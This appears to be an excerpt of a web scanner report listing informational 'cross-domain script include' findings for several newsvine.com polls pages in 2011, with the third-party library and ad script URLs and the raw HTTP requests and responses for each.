<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
...[SNIP]...
</div><script language="javascript" src="http://context3.kanoodle.com/cgi-bin/context.cgi?id=78053631&db=context&query=*general_network:premium&cgroup=newsvine&width=160&format=standard&numresults=4&linkcolor=993733&titlecolor=993733&title=1&textcolor=666666"></script>
...[SNIP]...

23.549. http://www.polls.newsvine.com/_nv/cms/info/jobs previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.polls.newsvine.com
Path:	/_nv/cms/info/jobs

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://context3.kanoodle.com/cgi-bin/context.cgi?id=78053631&db=context&query=*general_network:premium&cgroup=newsvine&width=160&format=standard&numresults=4&linkcolor=993733&titlecolor=993733&title=1&textcolor=666666
http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js
http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js
http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js
http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 03:16:51 GMT
Content-Length: 22585
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="Content-Ty
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/assets/skins/sam/skin.css">
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
...[SNIP]...
</div><script language="javascript" src="http://context3.kanoodle.com/cgi-bin/context.cgi?id=78053631&db=context&query=*general_network:premium&cgroup=newsvine&width=160&format=standard&numresults=4&linkcolor=993733&titlecolor=993733&title=1&textcolor=666666"></script>
...[SNIP]...

23.550. http://www.polls.newsvine.com/_nv/cms/info/privacyPolicy previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.polls.newsvine.com
Path:	/_nv/cms/info/privacyPolicy

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://context3.kanoodle.com/cgi-bin/context.cgi?id=78053631&db=context&query=*general_network:premium&cgroup=newsvine&width=160&format=standard&numresults=4&linkcolor=993733&titlecolor=993733&title=1&textcolor=666666
http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js
http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js
http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js
http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 03:16:53 GMT
Content-Length: 32656
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="Content-Ty
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/assets/skins/sam/skin.css">
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
...[SNIP]...
</div><script language="javascript" src="http://context3.kanoodle.com/cgi-bin/context.cgi?id=78053631&db=context&query=*general_network:premium&cgroup=newsvine&width=160&format=standard&numresults=4&linkcolor=993733&titlecolor=993733&title=1&textcolor=666666"></script>
...[SNIP]...

23.551. http://www.polls.newsvine.com/_nv/cms/info/userAgreement previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.polls.newsvine.com
Path:	/_nv/cms/info/userAgreement

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://context3.kanoodle.com/cgi-bin/context.cgi?id=78053631&db=context&query=*general_network:premium&cgroup=newsvine&width=160&format=standard&numresults=4&linkcolor=993733&titlecolor=993733&title=1&textcolor=666666
http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js
http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js
http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js
http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=299
Date: Sun, 30 Jan 2011 03:16:53 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 48326

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="Content-Ty
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/assets/skins/sam/skin.css">
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
...[SNIP]...
</div><script language="javascript" src="http://context3.kanoodle.com/cgi-bin/context.cgi?id=78053631&db=context&query=*general_network:premium&cgroup=newsvine&width=160&format=standard&numresults=4&linkcolor=993733&titlecolor=993733&title=1&textcolor=666666"></script>
...[SNIP]...

23.552. http://www.polls.newsvine.com/_nv/cms/welcome previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.polls.newsvine.com
Path:	/_nv/cms/welcome

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js
http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js
http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js
http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 03:16:32 GMT
Content-Length: 16514
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="Content-Ty
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/assets/skins/sam/skin.css">
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
...[SNIP]...

23.553. http://www.polls.newsvine.com/_vine/a previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.polls.newsvine.com
Path:	/_vine/a

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js
http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js
http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js
http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js

Request

Response

23.554. http://www.polls.newsvine.com/_vine/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.polls.newsvine.com
Path:	/_vine/search

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://context3.kanoodle.com/cgi-bin/context.cgi?id=78053631&db=context&query=*general_network:premium&cgroup=newsvine&width=160&format=standard&numresults=4&linkcolor=993733&titlecolor=993733&title=1&textcolor=666666
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js
http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js
http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js
http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js

Request

GET /_vine/search HTTP/1.1
Host: www.polls.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 03:15:35 GMT
Content-Length: 17471
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.7.0/build/assets/skins/sam/skin.css">
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
...[SNIP]...
</div><script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</div><script language="javascript" src="http://context3.kanoodle.com/cgi-bin/context.cgi?id=78053631&db=context&query=*general_network:premium&cgroup=newsvine&width=160&format=standard&numresults=4&linkcolor=993733&titlecolor=993733&title=1&textcolor=666666"></script>
...[SNIP]...

23.555. http://www.polls.newsvine.com/arts previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.polls.newsvine.com
Path:	/arts

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://context3.kanoodle.com/cgi-bin/context.cgi?id=78053631&db=context&query=*general_network:premium&cgroup=newsvinearts&width=160&format=standard&numresults=4&linkcolor=993733&titlecolor=993733&title=1&textcolor=666666
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js
http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js
http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js
http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js

Request

GET /arts HTTP/1.1
Host: www.polls.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 03:17:35 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58070

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.7.0/build/assets/skins/sam/skin.css">
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
...[SNIP]...
</div><script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</div><script language="javascript" src="http://context3.kanoodle.com/cgi-bin/context.cgi?id=78053631&db=context&query=*general_network:premium&cgroup=newsvinearts&width=160&format=standard&numresults=4&linkcolor=993733&titlecolor=993733&title=1&textcolor=666666"></script>
...[SNIP]...

23.556. http://www.polls.newsvine.com/business previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.polls.newsvine.com
Path:	/business

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://context3.kanoodle.com/cgi-bin/context.cgi?id=78053631&db=context&query=*general_network:premium&cgroup=newsvinebusiness&width=160&format=standard&numresults=4&linkcolor=993733&titlecolor=993733&title=1&textcolor=666666
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js
http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js
http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js
http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js

Request

GET /business HTTP/1.1
Host: www.polls.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 03:17:28 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 55161

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.7.0/build/assets/skins/sam/skin.css">
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
...[SNIP]...
</div><script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</div><script language="javascript" src="http://context3.kanoodle.com/cgi-bin/context.cgi?id=78053631&db=context&query=*general_network:premium&cgroup=newsvinebusiness&width=160&format=standard&numresults=4&linkcolor=993733&titlecolor=993733&title=1&textcolor=666666"></script>
...[SNIP]...

23.557. http://www.polls.newsvine.com/education previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.polls.newsvine.com
Path:	/education

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://context3.kanoodle.com/cgi-bin/context.cgi?id=78053631&db=context&query=*general_network:premium&cgroup=newsvineeducation&width=160&format=standard&numresults=4&linkcolor=993733&titlecolor=993733&title=1&textcolor=666666
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js
http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js
http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js
http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js

Request

GET /education HTTP/1.1
Host: www.polls.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 03:17:37 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 54588

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.7.0/build/assets/skins/sam/skin.css">
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
...[SNIP]...
</div><script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</div><script language="javascript" src="http://context3.kanoodle.com/cgi-bin/context.cgi?id=78053631&db=context&query=*general_network:premium&cgroup=newsvineeducation&width=160&format=standard&numresults=4&linkcolor=993733&titlecolor=993733&title=1&textcolor=666666"></script>
...[SNIP]...

23.558. http://www.polls.newsvine.com/entertainment previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.polls.newsvine.com
Path:	/entertainment

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://context3.kanoodle.com/cgi-bin/context.cgi?id=78053631&db=context&query=*general_network:premium&cgroup=newsvineentertainment&width=160&format=standard&numresults=4&linkcolor=993733&titlecolor=993733&title=1&textcolor=666666
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js
http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js
http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js
http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js

Request

GET /entertainment HTTP/1.1
Host: www.polls.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 03:17:22 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 57019

